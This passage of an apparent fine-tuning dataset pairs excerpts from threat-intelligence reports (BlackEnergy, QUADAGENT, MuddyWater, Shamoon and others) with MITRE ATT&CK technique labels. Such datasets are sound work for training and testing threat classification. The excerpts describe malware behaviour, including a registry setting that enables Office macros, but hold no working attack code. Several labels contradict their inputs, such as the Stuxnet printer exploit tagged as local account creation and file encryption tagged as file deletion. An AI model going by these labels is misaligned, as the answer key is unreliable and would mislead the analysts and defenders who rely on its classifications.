+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically \u201crefreshed\u201d their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Case in point: Last week, we came across a worm (detected by Trend Micro as Worm.Win32.BLADABINDI.AA) that propagates through removable drives and installs a fileless version of the BLADABINDI backdoor", + "output": "- T1120: Peripheral Device Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators", + "output": "- T1018: Remote System Discovery\n- T1047: Windows Management Instrumentation\n- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. In addition to acting as a web shell, the malware captures and DES-encrypts credentials before writing the username and password to disk. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries", + "output": "- T1505.003: Server Software Component - Web Shell\n- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it\u2019s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, QuarkBandit is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available Poison Ivy RAT. These RATs and the China Chopper web shell form the basis of GALLIUM\u2019s toolkit for maintaining access to a victim network", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For Linux Rabbit to establish a connection with the C2 server, it utilizes Tor hidden services to act as contact points to access a Tor gateway. The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB, HTTP, WCF and RAW Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc. The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. karmaSMB.py: A SMB Server that answers specific file contents regardless of the SMB share and pathname specified. smbserver.py: A Python implementation of an SMB server", + "output": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"\"BlackWater\"\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field\"", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\"\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. Get Microsoft Version Number from the registry, specifically from reg key/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1\"", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The anti-detection launcher and decompressor make extensive use of Metasploit\u2019s shikata_ga_nai encoder as well as LZNT1 compression", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on the use of the relatively unique PLAINTEE malware, the malware\u2019s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document. By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious\u2019 codes small footprint can help enable evasion of automated detection mechanisms based on macro content", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The printer vulnerability MS10-061 exploited by Stuxnet \u2013 using a special MOF file, executed on the attacked system using WMI", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets\u2019 networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named \u201csysvolinfo.exe\u201d. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork\u2019s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory. The file name is hardcoded and obfuscated with XOR. The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection", + "output": "- T1070.005: Indicator Removal - Network Share Connection Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Targets common cloud applications such as web servers for initial access, using known vulnerabilities (\u201c1-days\u201d) \u2013 presumably those with a working exploit in the wild. Uses Windows container escape techniques to escape the container and gain code execution on the underlying node. Connects to its C2 server using the IRC protocol over the Tor network", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Intelligence gathering and stealing information has generally been the motivation behind Cicada\u2019s attacks in the past, and that would appear to be the case in this attack campaign too. We observed the attackers archiving some folders of interest in these attacks, including in one organization folders relating to human resources (HR), audit and expense data, and meeting memos", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macros are also responsible for achieving reboot persistence for the ObliqueRAT payloads. This is done by creating a shortcut (.url file extension) in the infected user's Startup directory. Malicious shortcut in the infected user's startup directory to execute ObliqueRAT on startup", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It will then resolve the current process\u2019s PID and path to be used as script arguments, and proceeds to execute the script by running: /bin/sh -c ./update.sh <process_id> <process_path", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"\"Blackwater.bas\"\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. rCecms=BlackWater\"\". Notably, the trojanized document's macro was also called \"\"BlackWater,\"\" and the value \"\"BlackWater\"\" was hard coded into the PowerShell script. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information\"", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The \u2018jli.dll\u2019 file acts as the first layer of the Ecipekac loader. This DLL file has a number of export functions; however, all of them refer to a similar function that carries the main loading feature", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We believe the malware authors chose to send packets that look like legitimate DNS requests over UDP port 53 to avoid being blocked by firewalls. It is very common to whitelist DNS requests in firewall configurations because blocking them could disrupt name resolution", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. 